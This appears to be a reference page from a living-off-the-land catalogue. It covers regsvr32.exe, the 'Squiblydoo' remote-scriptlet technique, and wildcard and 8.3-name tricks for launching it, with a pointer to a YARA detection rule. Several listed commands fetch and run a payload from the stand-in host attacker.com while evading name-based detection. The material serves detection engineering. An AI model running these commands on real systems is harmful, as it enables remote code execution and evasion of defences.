regsvr32
Registers and unregisters OLE controls. Can execute remote scriptlets (scrobj.dll) — the 'Squiblydoo' technique.
Binary Paths
C:\Windows\System32\regsvr32.exeC:\Windows\SysWOW64\regsvr32.exe
Glob Patterns
| Pattern | Notes |
|---|---|
for /f %i in ('where regsvr3?.exe') do %i
|
Wildcard replaces '2' |
for /f %i in ('where r*svr32.exe') do %i
|
Star replaces 'eg' |
for /f %i in ('where regsvr*.exe') do %i
|
Star matches '32' |
for /f %i in ('dir /b C:\Windows\System32\regsvr*.exe') do %i
|
dir glob search |
for %i in (C:\Windows\System32\regsvr*.exe) do @%i /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
|
Native CMD for loop with filesystem glob — expands regsvr*.exe directly in System32 without where.exe |
for /f %i in ('where /r C:\Windows regsvr*.exe') do %i /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
|
Recursive where search across Windows tree — finds regsvr32.exe in System32 and SysWOW64 |
forfiles /p C:\Windows\System32 /m regsvr*.exe /c "@file /s /n /u /i:http://attacker.com/payload.sct scrobj.dll"
|
forfiles * mask finds regsvr32.exe — @file expands to matched filename for Squiblydoo execution |
C:\Windows\System32\REGSVR~1.EXE /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
|
8.3 SFN — REGSVR~1 auto-generated for regsvr32.exe; requires NtfsDisable8dot3NameCreation=0 |
cmd /c for /f %i in ('where regsvr*.exe') do %i /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
|
cmd /c wrapper adds an extra process layer — glob resolves via where; parent process becomes cmd.exe not the caller |
Pattern Tester
$
Try typing regsvr32 or a full path like C:\Windows\System32\regsvr32.exe
YARA Rule
Auto-generated detection rule for regsvr32